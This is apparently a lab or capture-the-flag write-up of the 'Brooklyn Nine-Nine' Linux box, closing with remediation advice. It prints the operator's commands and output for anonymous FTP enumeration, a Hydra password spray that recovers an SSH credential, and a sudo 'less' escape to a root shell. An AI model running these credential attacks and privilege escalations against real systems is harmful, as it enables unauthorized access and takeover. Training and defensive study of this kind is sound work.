Anonymous FTP note, SSH spray, and sudo less escape
Foundations Linux engagement: anonymous FTP leaked usernames and a weak-password hint; Hydra recovered jake’s SSH secret; NOPASSWD less spawned a root shell via GTFOBins.
- Case files
- Anonymous FTP note, SSH spray, and sudo less escape
Anonymous FTP disclosed operational notes naming jake. Rockyou spray unlocked SSH; sudo less completed root without a password.
FTP note guided Hydra; jake:987654321 authenticated over SSH.
NOPASSWD less accepted !/bin/sh for a root shell.
Engagement summary
Anonymous FTP disclosed operational notes naming jake. Rockyou spray unlocked SSH; sudo less completed root without a password.
BROOKLYN NINE-NINE (10.10.112.152) exposed vsftpd with anonymous read, OpenSSH, and Apache. note_to_jake.txt named Amy, Jake, and Holt and stated Jake’s password was weak. Hydra against SSH recovered jake:987654321. The user artifact lived under holt’s home. sudo -l allowed /usr/bin/less as root with NOPASSWD; opening any file and escaping with !/bin/sh returned a root shell.
Business impact
Anonymous FTP that publishes usernames accelerates credential attacks. Weak SSH passwords and interactive pagers under sudo are root. Disable anonymous FTP, enforce strong SSH secrets or keys, and never grant less/more/man via sudo.
Anonymous FTP and SSH spray
FTP note guided Hydra; jake:987654321 authenticated over SSH.
OPERATOR · FTP / HYDRA
savvy@lab:~$ nmap 10.10.112.152 -sV -sC -Pn
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1
savvy@lab:~$ ftp 10.10.112.152
Name: anonymous
ftp> get note_to_jake.txt
# Jake's password is weak; users Amy/Jake/Holt
savvy@lab:~$ hydra -l jake -P /usr/share/wordlists/rockyou.txt 10.10.112.152 ssh -t 50
[22][ssh] login: jake password: 987654321
savvy@lab:~$ ssh jake@10.10.112.152
savvy@lab:~$
sudo less to root
NOPASSWD less accepted !/bin/sh for a root shell.
OPERATOR · ROOT
savvy@lab:~$ sudo -l
(root) NOPASSWD: /usr/bin/less
savvy@lab:~$ sudo less /etc/profile
!/bin/sh
root@lab:~# id
uid=0(root) gid=0(root) groups=0(root)
Remediation
Require authenticated FTP or remove it. Enforce MFA/keys for SSH. Replace sudo less with non-interactive, least-privilege tooling.